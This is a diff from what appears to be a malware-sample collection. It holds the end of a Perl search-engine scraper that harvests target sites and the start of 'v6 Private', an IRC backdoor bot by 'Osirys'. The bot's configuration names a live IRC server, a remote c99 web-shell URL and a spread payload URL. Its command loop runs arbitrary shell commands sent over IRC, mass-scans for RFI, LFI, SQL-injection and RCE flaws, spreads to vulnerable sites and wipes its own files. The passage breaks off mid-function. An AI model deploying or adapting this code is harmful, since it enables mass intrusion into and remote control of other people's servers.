$inizio=1; +my $pagine=200; +my @lst; +my $av=0; +while($inizio <= $pagine){ +my $fireball="http://suche.fireball.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=fb_loc&idx=all&enc=utf-8"; +my $Res=query($fireball); +while ($Res=~ m/<a href=\"?http:\/\/(.+?)\//g ){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k="$1/"; +my @grep=links($k); +push(@lst,@grep); +}} +$av=$av+10; +$inizio++; +} +return @lst; +} + +##### +# SUBS UOL +##### +sub uol(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $UoL=("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$i); +my $Res=query($UoL); +while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){ +my $k=$1; +if($k!~/busca|uol|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# Altavista +##### +sub altavista(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b); +my $Res=query($AlT); +while($Res=~m/<span class=ngrn>(.+?)\//g){ +if($1 !~ /altavista/){ +my $k=$1; +$k=~s/<//g; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +sub altavistade(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $AlT=("http://de.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b); +my $Res=query($AlT); +while($Res=~m/<span class=ngrn>(.+?)\//g){ +if($1 !~ /altavista/){ +my $k=$1; +$k=~s/<//g; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +sub altavistaus(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $AlT=("http://us.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b); +my $Res=query($AlT); +while($Res=~m/<span class=ngrn>(.+?)\//g){ +if($1 !~ /altavista/){ +my $k=$1; +$k=~s/<//g; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# HotBot +##### +sub hotbot(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $hot=("http://search.hotbot.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=hb_loc&enc=utf-8".$b); +my $Res=query($hot); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +sub hotbotb(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $hot=("http://search.hotbot.co.uk/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=hb_loc&enc=utf-8".$b); +my $Res=query($hot); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# Mamma +##### +sub mamma(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $mam=("http://www.mamma.com/Mamma?utfout=$av&qtype=0&query=".key($key)."".$b); +my $Res=query($mam); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# MozBot +##### +sub mozbot() +{ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=100; $i+=1){ +my $mozbot=("http://www.mozbot.fr/search?q=".key($key)."&st=int&page=".$i); +my $Res=query($mozbot); +while($Res =~ m/<a href=\"?http:\/\/(.+?)\" target/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub mozbota() +{ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=100; $i+=1){ +my $mozbot=("http://www.mozbot.co.uk/search?q=".key($key)."&st=int&page=".$i); +my $Res=query($mozbot); +while($Res =~ m/<a href=\"?http:\/\/(.+?)\" target/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub mozbotb() +{ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=100; $i+=1){ +my $mozbot=("http://www.mozbot.com/search?q=".key($key)."&st=int&page=".$i); +my $Res=query($mozbot); +while($Res =~ m/<a href=\"?http:\/\/(.+?)\" target/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +##### +# SUBS AOL +##### +sub aol(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=100;$b++){ +my $AoL=("http://search.aol.co.uk/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8"); +my $Res=query($AoL); +while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub aola(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=59;$b+=1){ +my $AoL=("http://205.188.99.136/aol/search?query=".key($key)."&page=".$b."&count_override=20&lr=lang_en"); +my $Res=query($AoL); +while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub aolb(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=59;$b+=1){ +my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&count_override=20&lr=lang_de"); +my $Res=query($AoL); +while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub aolc(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=59;$b+=1){ +my $AoL=("http://64.12.129.44/aol/search?query=".key($key)."&page=".$b."&count_override=20&lr=lang_fr"); +my $Res=query($AoL); +while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +##### +# SUBS ASK +##### +sub ask(){ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=1000; $i+=10) +{ +my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all"); +my $Res=query($Ask); +while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){ +my $k=$3; +$k=~s/[\"\ ]//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub aska(){ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=1000; $i+=10) +{ +my $Ask=("http://uk.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all"); +my $Res=query($Ask); +while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){ +my $k=$3; +$k=~s/[\"\ ]//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub askb(){ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=1000; $i+=10) +{ +my $Ask=("http://de.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all"); +my $Res=query($Ask); +while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){ +my $k=$3; +$k=~s/[\"\ ]//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub links() +{ +my @l; +my $link=$_[0]; +my $host=$_[0]; +my $hdir=$_[0]; +$hdir=~s/(.*)\/[^\/]*$/\1/; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$host.="/"; +$link.="/"; +$hdir.="/"; +$host=~s/\/\//\//g; +$hdir=~s/\/\//\//g; +$link=~s/\/\//\//g; +push(@l,$link,$host,$hdir); +return @l; +} + +sub geths(){ +my $host=$_[0]; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +return $host; +} + +sub os(){ +my $sito=$_[0]; +my $Res=query($sito); +my $type; +my $free; +my $str; +while($Res=~m/<br>OSTYPE:(.+?)\<br>/g){ +$type=$1; +} +while($Res=~m/<br>Free:(.+?)\<br>/g){ +$free=$1; +} +$str=$type.",".$free; +return $str; +} + +sub key(){ +my $chiave=$_[0]; +$chiave =~ s/ /\+/g; +$chiave =~ s/:/\%3A/g; +$chiave =~ s/\//\%2F/g; +$chiave =~ s/&/\%26/g; +$chiave =~ s/\"/\%22/g; +$chiave =~ s/,/\%2C/g; +$chiave =~ s/\\/\%5C/g; +return $chiave; +} + +sub query($){ +my $url=$_[0]; +$url=~s/http:\/\///; +my $host=$url; +my $query=$url; +my $page=""; +$host=~s/href=\"?http:\/\///; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$query=~s/$host//; +if ($query eq "") {$query="/";}; +eval { +my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; +print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +close($sock); +}; +return $page; +} + +sub unici{ +my @unici = (); +my %visti = (); +foreach my $elemento ( @_ ) +{ +next if $visti{ $elemento }++; +push @unici, $elemento; +} +return @unici; +} + +sub http_query($){ +my ($url) = @_; +my $host=$url; +my $query=$url; +my $page=""; +$host =~ s/href=\"?http:\/\///; +$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$query =~s/$host//; +if ($query eq "") {$query="/";}; +eval { +local $SIG{ALRM} = sub { die "1";}; +alarm 10; +my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; +print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +alarm 0; +close($sock); +}; +return $page; +} +} + +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By klepek_klepek # +# #AnakDompu # +# irc.dal.net # +################################################## diff --git a/Perl/Backdoor.Perl.IRCBot.ai.txt b/Perl/Backdoor.Perl.IRCBot.ai.txt new file mode 100644 index 00000000..efa8ae5e --- /dev/null +++ b/Perl/Backdoor.Perl.IRCBot.ai.txt @@ -0,0 +1,2052 @@ + + ##################################################################################### + ## ## + ## 15/06/2008 ## + ## Author : Osirys ## + ## WebSite : ## + ## Contact : osirys[at]live[dot]it ## + ## Italian Coder ## + ## ## + ## ## IMPORTANT ## ## + ## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY ## + ## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !! ## + ## ## ## + ## ## + ## Release: v6 Private ## + ## After the success of the v5, I decided to code a new release :-) ## + ## This is a private script. If you have it, keep it priv8 !!! ## + ## ## + ## Features: ## + ## [+]Sql Injection Scanner (Fixed a bug which release v5 was affected) ## + ## [+]Remote File Inclusion Scanner ## + ## [+]Local File Inclusion Scanner ## + ## [+]Remote Code Execution Scanner ## + ## [+]Mass Scan, Google,AlltheWeb,Yahoo, Msn domains: ## + ## .at/.com.au/.com.br/.ca/.ch/.cn/.de/.dk/.es/.fr/.it/.co.jp/.com.mx/.co.uk ## + ## [+]Integrated Shell, so you can execute commands on the server ## + ## [+]Security Mode to protect "dangerous" functions ## + ## [+]Spread Mode, to activate or disable Spread Function ## + ## [+]Single Spread Mode, to spread on RFI vulnerable sites ## + ## [+]Bypass Engines ON: Google, Yahoo ## + ## !: To "bypass" these engines, the Scanner just looks for websites on other ## + ## engines that use the same bots than the main ones ## + ## ## + ##################################################################################### + + +use IO::Socket::INET; +use HTTP::Request; +use LWP::UserAgent; + +####################################################### +## CONFIGURATION // +####################################################### + +$auth = "Osirys"; +$authmail = "osirys\@live.it"; +my $id = "http://afe.la/id.txt?"; #Your RFI Response +my $shell = "http://web4cc.t35.com/c99.txt?"; #Shell printed on the Vulnerable Site +my $ircd = "afro.hitmanslife.net"; #Irc-Server +my $port = "6667"; #Irc-Server Port +my $chan1 = "#achap"; #Chan for Scan +my $chan2 = "#achap"; #Results will be printed here too +my $nick = "ashraf|".int(rand(99))."[xx]"; #Nick +my @admins = ("b"); +my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1) +# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood! +# Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed. +my $rfipidpr0c = 50; + +### USEFULL OPTIONS ( 0 => OFF ; 1 => ON ) + +my $spread = "http://afe.la/b?"; + +my $spreadACT = 0; #0 ->disabled, 1 ->enabled +my $securityACT = 0; #0 ->disabled, 1 ->enabled +&cheek(); +my $killpwd = "lol"; #Password to Kill the Bot +my $chidpwd = "lol"; #Password to change the RFI Response +my $cmdpwd = "achap123"; #Password to execute commands on the server +my $secpwd = "achap123"; #Passowrd to enable/disable the Security Mode +my $spreadpwd = "achap123"; #Passowrd to enable/disable the Spread Mode + +my $badspreadpwd != $spreadpwd; +my $badkillpwd != $killpwd; +my $badidpwd != $chidpwd; +my $badcmdpwd != $cmdpwd; +my $badsecpwd != $secpwd; + +####################################################### +## END OF CONFIGURATION // +####################################################### + +$k= 0; +print q{ +------------------------------------------------ + __ ___ + __ __/ / / __| __ __ _ _ _ _ _ ___ _ _ + \ V / _ \ \__ \/ _/ _` | ' \| ' \/ -_) '_| + \_/\___/ |___/\__\__,_|_||_|_||_\___|_| + +------------------------------------------------ +[+] Coded by Osirys +[+] Contact: osirys[at]live[it] +[+] Keep it private ! +[+] *New release, more fun ;) +[+] *Updated to: 18/06/2008 + +}; + +open($f1le, ">", "rm.txt"); +print $f1le "\#!/usr/bin/perl\n"; +print $f1le "exec(\"rm -rf \*siti\* && rm rm.txt\")\;\n"; +close $f1le; + +@help = ( +"15,1[!] 9,1!response 15,1 > 11,1Test if the RFI Response is working", +"15,1[*] 9,1!chid <new rfi-id> 15,1 > 11,1Change the RFI-Response", +"15,1[*] 9,1!killme 15,1 > 11,1KILL The Bot", +"15,1[!] 9,1!milw0rm rss 15,1 > 11,1Get the last Milw0rm bugs", +"15,1[!] 9,1!new rfi bugs 15,1 > 11,1Get the last 10 RFI bugs", +"15,1[!] 9,1!new lfi bugs 15,1 > 11,1Get the last 10 LFI bugs", +"15,1[!] 9,1!new sql bugs 15,1 > 11,1Get the last 10 SQL Injection bugs", +"15,1[!] 9,1!new rce bugs 15,1 > 11,1Get the last 10 RCE bugs", +"15,1[!] 9,1!rfi <bug> <dork> -p <sites/proc> 15,1 > 11,1Start the RFI Scanner", +"15,1[!] 9,1!lfi <bug> <dork> 15,1 > 11,1Start the LFI Scanner", +"15,1[!] 9,1!sql <bug> <dork> -p <sites/proc> 15,1 > 11,1Start the SQL Injection Scanner", +"15,1[!] 9,1!rce <bug> <dork> -p <sites/proc> 15,1 > 11,1Start the RCE Scanner", +"15,1[!] 9,1!mass[rfi/lfi/sql/rce] <bug> <dork> -p <sites/proc> 15,1 > 11,1Start the Mass Scan", +"15,1[*] 9,1!cmd <bashline> 15,1 > 11,1Gives command on the Bot's shell. Ex: (!cmd id) (!cmd uname -a)", +"15,1[*] 9,1!sspread -s <RFI_Vuln_site> 15,1 > 11,1To spread on a vulnerable host. Ex: (!spread -s www.h.com/a.php?bug=)", +"15,1[*] 9,1!admin add/remove <nickname> 15,1 > 11,1To add/remove a nickname to/from the admin list", +"15,1[*] 9,1/msg $nick !Sec ON/OFF -p <pwd> 15,1 > 11,1To enable or disable Security Mode", +"15,1[*] 9,1/msg $nick !Spread ON/OFF -p <pwd> 15,1 > 11,1To enable or disable Spread Mode", +"15,1[!] 9,1!info 15,1 > 11,1Get infos about the Bot", +"4,1[!!] For commands with the15,1 [*]4,1 you must be an Admin of the v6" +); + +my $sys = `uname -a`; +my $up = `uptime`; + +if ($spreadACT == 0) { + $t5 = "OFF"; +} +elsif ($spreadACT == 1) { + $t5 = "ON"; +} + +if ($securityACT == 0) { + $y5 = "OFF"; +} +elsif ($securityACT == 1) { + $y5 = "ON"; +} + +if (fork() == 0) { + &irc($ircd, $port, $chan1, $chan2, $nick); +} +else { + exit(0); +} + +sub irc() { + my ($ircd, $port, $chan1, $chan2, $nick) = @_; + $c0n = IO::Socket::INET->new(PeerAddr => "$ircd",PeerPort => "$port",Proto => "tcp") || die "Can not connect on server!\n"; + $c0n->autoflush(1); + print $c0n "NICK $nick\n"; + print $c0n "USER soldier 8 * : Osirys\n"; + print $c0n "JOIN $chan1\n"; + writ1("4,1_/9,1 V6-Private 11,1ON 7,1_>"); + writ1("4,1й Coded by Osirys"); + while ($line = <$c0n>) { + + $k++; + my @word = split /\:/, $line; + my @words = split /\!/, $word[1]; + my $sys = `uname -a`; + my $up = `uptime`; + @info = ( + "9,1[i] 15,1Release : 11,1v6 -Private IrcBot", + "9,1[i] 15,1Author : 11,1$auth - Italian coder", + "9,1[i] 15,1Contact : 11,1$authmail", + "9,1[i] 15,1Uname -a: 11,1$sys", + "9,1[i] 15,1Uptime : 11,1$up", + "9,1[i] 15,1Spread Mode: 11,1$t5", + "9,1[i] 15,1Security Mode: 11,1$y5" + ); + + if ($spreadACT == 0) { + $t5 = "OFF"; + } + elsif ($spreadACT == 1) { + $t5 = "ON"; + } + + if ($securityACT == 0) { + $y5 = "OFF"; + } + elsif ($securityACT == 1) { + $y5 = "ON"; + } + + + if ($line =~ /^PING \:(.*)/) { + print $c0n "PONG :$1"; + } + if ($line =~ /001/) { + print $c0n "JOIN $chan1\n"; + } + if ($line =~ /PRIVMSG $chan1 :!help/) { + &help(); + } + if ($line =~ /PRIVMSG $chan1 :!info/){ + &info(); + } + if ($line =~ /PRIVMSG $chan1 :!response/) { + &response(); + } + if ($line =~ /PRIVMSG $chan1 :!milw0rm rss/) { + &milw0rm(); + } + if ($line =~ /PRIVMSG $chan1 :!new ([a-z]{3}) bug/) { + &bug_update($1); + } + if (($line =~ /PRIVMSG $chan1 :!chid\s+(.*)/)&&($securityACT == 0)) { + &chid($words[0],$1); + } + if (($line =~ /PRIVMSG $nick :!chid\s+(.*) -p $chidpwd/)&&($securityACT == 1)) { + &chid($words[0],$1,"a"); + } + elsif (($line =~ /PRIVMSG $nick :!chid\s+(.*) -p $badidpwd/)&&($securityACT == 1)) { + pm($words[0],"15,1[-] 9,1Error Changing the RFI-Response (bad Password)!"); + } + if (($line =~ /PRIVMSG $chan1 :!killme/)&&($securityACT == 0)) { + &killme($words[0]); + } + if (($line =~ /PRIVMSG $nick :!killme -p $killpwd/)&&($securityACT == 1)) { + &killme($words[0],"a"); + } + elsif (($line =~ /PRIVMSG $nick :!killme -p $badkillpwd/)&&($securityACT == 1)) { + pm($words[0],"15,1[-] 12,4Error Killing the Bot (Null or bad Password) !"); + } + if (($line =~ /PRIVMSG $chan1 :!admin (add|remove)\s+(.*)/)&&($securityACT == 0)) { + &ch_admin($1,$words[0],$2); + } + if (($line =~ /PRIVMSG $nick :!admin (add|remove)\s+(.*) -p $chadminpwd/)&&($securityACT == 1)) { + &ch_admin($1,$words[0],$2,"a"); + } + elsif (($line =~ /PRIVMSG $nick :!admin (add|remove)\s+(.*) -p $badchadminpwd/)&&($securityACT == 1)) { + pm($words[0],"15,1[-] 12,4Error changing the Admin list (Null or bad Password) !"); + } + if (($line =~ /PRIVMSG $chan1 :!cmd\s+(.*)/)&&($securityACT == 0)) { + &cmd($words[0],$1); + } + if (($line =~ /PRIVMSG $nick :!cmd\s+(.*) -p $cmdpwd/)&&($securityACT == 1)) { + &cmd($words[0],$1,"a"); + } + elsif (($line =~ /PRIVMSG $nick :!cmd\s+(.*) -p $badcmdpwd/)&&($securityACT == 1)) { + pm($words[0],"15,1[-] 12,4Error using the shell (Null or bad Password) !"); + } + if ($line =~ /PRIVMSG $nick :!Sec\s+(.*) -p $secpwd/) { + &sec($words[0],$1); + } + elsif ($line =~ /PRIVMSG $nick :!Sec\s+(.*) -p $badsecpwd/) { + pm($words[0],"15,1[-] 12,4Error changing the Security Mode (Null or bad Password) !"); + } + if (($line =~ /PRIVMSG $chan1 :!Spread\s+(.*)/)&&($securityACT == 0)) { + &spread($words[0],$1); + } + if (($line =~ /PRIVMSG $nick :!Spread\s+(.*) -p $spreadpwd/)&&($securityACT == 1)) { + &spread($words[0],$1,"a"); + } + elsif (($line =~ /PRIVMSG $nick :!Spread\s+(.*) -p $badspreadpwd/)&&($securityACT == 1)) { + pm($words[0],"15,1[-] 12,4Error changing the Spread Mode (Null or bad Password) !"); + } + if ($line =~ /PRIVMSG $chan1 :!sspread -s\s+(.*)/) { + &sspread($words[0],$1); + } + if (($line =~ /PRIVMSG $chan1 :!rfi\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 1)&&(fork() == 0)) { + &rfi_cheek($1,$2,$3,"s",$words[0]); + } + if (($line =~ /PRIVMSG $chan1 :!rfi\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 0)&&(fork() == 0)) { + &rfi_cheek($1,$2,$3,"j"); + } + if (($line =~ /PRIVMSG $chan1 :!lfi\s+(.*?)\s+(.*)/)&&($securityACT == 1)&&(fork() == 0)) { + &lfi_cheek($1,$2,$3,"s",$words[0]); + } + if (($line =~ /PRIVMSG $chan1 :!lfi\s+(.*?)\s+(.*)/)&&($securityACT == 0)&&(fork() == 0)) { + &lfi_cheek($1,$2,"j"); + } + if (($line =~ /PRIVMSG $chan1 :!sql\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 1)&&(fork() == 0)) { + &sql_cheek($1,$2,$3,"s",$words[0]); + } + if (($line =~ /PRIVMSG $chan1 :!sql\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 0)&&(fork() == 0)) { + &sql_cheek($1,$2,$3,"j"); + } + if (($line =~ /PRIVMSG $chan1 :!rce\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 1)&&(fork() == 0)) { + &rce_cheek($1,$2,$3,"s",$words[0]); + } + if (($line =~ /PRIVMSG $chan1 :!rce\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 0)&&(fork() == 0)) { + &rce_cheek($1,$2,$3,"j"); + } + if (($line =~ /PRIVMSG $chan1 :!mass\[(rfi|lfi|sql|rce)\]\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 1)&&(fork() == 0)) { + &mass_cheek($1,$2,$3,$4,"s",$words[0]); + } + if (($line =~ /PRIVMSG $chan1 :!mass\[(rfi|lfi|sql|rce)\]\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 0)&&(fork() == 0)) { + &mass_cheek($1,$2,$3,$4,"j"); + } + } +} + +sub help() { + if ($securityACT == 0) { + @help; + foreach my $e(@help){ + writ1("$e"); + } + } + elsif ($securityACT == 1) { + @help; + $help[1] = "15,1[*] 9,1/msg $nick !chid <new rfi-id> -p <pwd> 15,1 > 11,1Change the RFI-Response"; + $help[2] = "15,1[*] 9,1/msg $nick !killme 15,1 > -p <pwd> 11,1KILL The Bot"; + $help[8] = "15,1[*] 9,1!rfi <bug> <dork> -p <sites/proc> 15,1 > 11,1Start the RFI Scanner"; + $help[9] = "15,1[*] 9,1!lfi <bug> <dork> 15,1 > 11,1Start the LFI Scanner"; + $help[10] = "15,1[*] 9,1!sql <bug> <dork> -p <sites/proc> 15,1 > 11,1Start the SQL Injection Scanner"; + $help[11] = "15,1[*] 9,1!rce <bug> <dork> -p <sites/proc> 15,1 > 11,1Start the RCE Scanner"; + $help[12] = "15,1[*] 9,1!mass[rfi/lfi/sql/rce] <bug> <dork> -p <sites/proc> 15,1 > 11,1Start the Mass Scan"; + $help[13] = "15,1[*] 9,1/msg $nick !cmd <bashline> -p <pwd> 15,1 > 11,1Gives command on the Bot's shell. Ex: (!cmd id) (!cmd uname -a)"; + $help[14] = "15,1[*] 9,1/msg $nick !spread -s <RFI_Vuln_site> -p <pwd> 15,1 > 11,1To spread on a vulnerable host. Ex: (!spread -s www.h.com/a.php?bug=)"; + $help[15] = "15,1[*] 9,1/msg $nick !admin add/remove <nickname> -p <pwd> 15,1 > 11,1To add/remove a nickname to/from the admin list"; + $help[16] = "15,1[*] 9,1/msg $nick !Sec ON/OFF -p <pwd> 15,1 > 11,1To enable or disable Security Mode"; + $help[17] = "15,1[*] 9,1/msg $nick !Spread ON/OFF -p <pwd> 15,1 > 11,1To enable or disable Spread Mode"; + $#help = 18; + writ1("4,1[!] Security Mode is ON. To use *commands you have to be an admin of the v6"); + foreach my $e(@help){ + writ1("$e"); + } + } +} + +sub info() { + @info; + foreach my $n(@info) { + writ1("$n"); + } +} + +sub response() { + my $re = query($id); + if ($re =~ /Osirys/) { + writ1("15,1[+] 12,9RFI Response is working !"); + } + else { + writ1("15,1[-] 12,4RFI Response is NOT working !"); + } +} + +sub milw0rm() { + my $mlink = ("http://www.milw0rm.com/rss.php"); + my $re = query($mlink); + my $l = -1; + while ($re =~ m/<title>(.+?)<\/title>/g){ + my $title = $1; $title =~ s/\<\;/</g; + if ($title !~ /milw0rm/) { + push(@ttot,$title); + } + } + while ($re =~ m/<link>(.+?)<\/link>/g) { + my $link = $1; + if ($link !~ /http:\/\/milw0rm.com\//) { + push(@ltot,$link); + } + } + writ1("15,1[+] 4,1Last Milw0rm bugs:"); + foreach my $n(@ttot){ + $l++; + writ1("15,1[+] 9,1$n4,1 -11,1 $ltot[$l]"); + } +} + +sub bug_update() { + my $kind = $_[0]; + if ($kind =~ /rfi/) { + my @re = query("nostrosito"); #Put here a link in .txt with a list of bugs + writ1("15,1[+] 9,1Last 10 RFI bugs:"); + foreach my $n(@re) { + writ1(" 9,1$n "); + } + } + elsif ($kind =~ /lfi/) { + my @re = query("nostrosito"); #Put here a link in .txt with a list of bugs + writ1("15,1[+] 9,1Last 10 LFI bugs:"); + foreach my $n(@re) { + writ1(" 9,1$n "); + } + } + elsif ($kind =~ /sql/) { + my @re = query("nostrosito"); #Put here a link in .txt with a list of bugs + writ1("15,1[+] 9,1Last 10 SQL-INJ bugs:"); + foreach my $n(@re) { + writ1(" 9,1$n "); + } + } + elsif ($kind =~ /rce/) { + my @re = query("nostrosito"); #Put here a link in .txt with a list of bugs + writ1("15,1[+] 9,1Last 10 RCE bugs:"); + foreach my $n (@re) { + writ1(" 9,1$n "); + } + } +} + +sub chid() { + my $nick = $_[0]; + my $newid = $_[1]; + my $reply = $_[2]; + my $val = admin($nick); + if ($val == 1) { + $id = $newid; + if ($reply =~ /a/) { + pm($nick, "15,1[+] 9,1New RFI Response: $id"); + } + writ1("15,1[+] 9,1RFI Response changed !"); + writ1("15,1[+] 9,1New RFI Response: $id"); + } + else { + pm($nick,"4,1[!] You are not authorized to execute this command!"); + } +} + +sub killme() { + my $nick = $_[0]; + my $reply = $_[1]; + my $val = admin($nick); + if ($reply =~ /a/) { + if ($val == 1) { + pm($nick, "15,1[!] 12,4Bye Bye !"); + writ1("15,1[!] 12,4Bye Bye !"); + print $c0n "QUIT"; + exec("perl rm.txt && pkill perl \n"); + } + } + else { + if ($val == 1) { + writ1("15,1[!] 12,4Bye Bye !"); + print $c0n "QUIT"; + exec("perl rm.txt && pkill perl \n"); + } + else { + writ1("4,1[!] You are not authorized to execute this command!"); + } + } +} + +sub ch_admin() { + @admins; + my $command = $_[0]; + my $nick = $_[1]; + my $nick2 = $_[2]; + my $mode = $_[3]; + my $val = admin($nick); + if ($val == 1) { + if ($command =~ /add/) { + if ($mode =~ /a/) { + pm($nick,"15,1[+] 12,9$nick2 added in the Admin List!!"); + } + push(@admins, $nick2); + writ1("15,1[+] 12,9$nick added $nick2 in the Admin List!!"); + } + elsif ($command =~ /remove/) { + $t_adm = scalar(@admins); + foreach my $a(@admins){ + if ($a eq $nick2) { + $l = $t_adm +1; + $a = $a[$l]; + $#admins = $t_adm; + } + } + if ($mode =~ /a/) { + pm($nick,"15,1[+] 12,9$nick2 removed from the Admin List!!"); + } + writ1("15,1[+] 12,9$nick removed $nick2 from the Admin List!!"); + } + } + else { + pm($nick,"4,1[!] You are not authorized to execute this command!"); + } +} + +sub cmd() { + my $nick = $_[0]; + my $cmd = $_[1]; + my $reply = $_[2]; + my $val = admin($nick); + if ($val == 1) { + if ($reply =~ /a/) { + if ($cmd =~ /cd (.*)/) { + chdir($1) || pm($nick,"Can't change dir"); + #return; + } + my @output = `$cmd`; + my $count = 0; + foreach my $out(@output) { + $count++; + if ($count == 10) { + sleep(3); + $count = 0; + } + pm($nick,"15,1[+] 7,1$out"); + } + } + else { + if ($cmd =~ /cd (.*)/) { + chdir($1) || writ1("Can't change dir"); + #return; + } + my @output = `$cmd`; + my $count = 0; + foreach my $out(@output) { + $count++; + if ($count == 10) { + sleep(3); + $count = 0; + } + writ1("15,1[+] 7,1$out "); + } + } + } + else { + pm($nick,"4,1[!] You are not authorized to execute this command!"); + } +} + +sub sec() { + my $nick = $_[0]; + my $mode = $_[1]; + my $val = 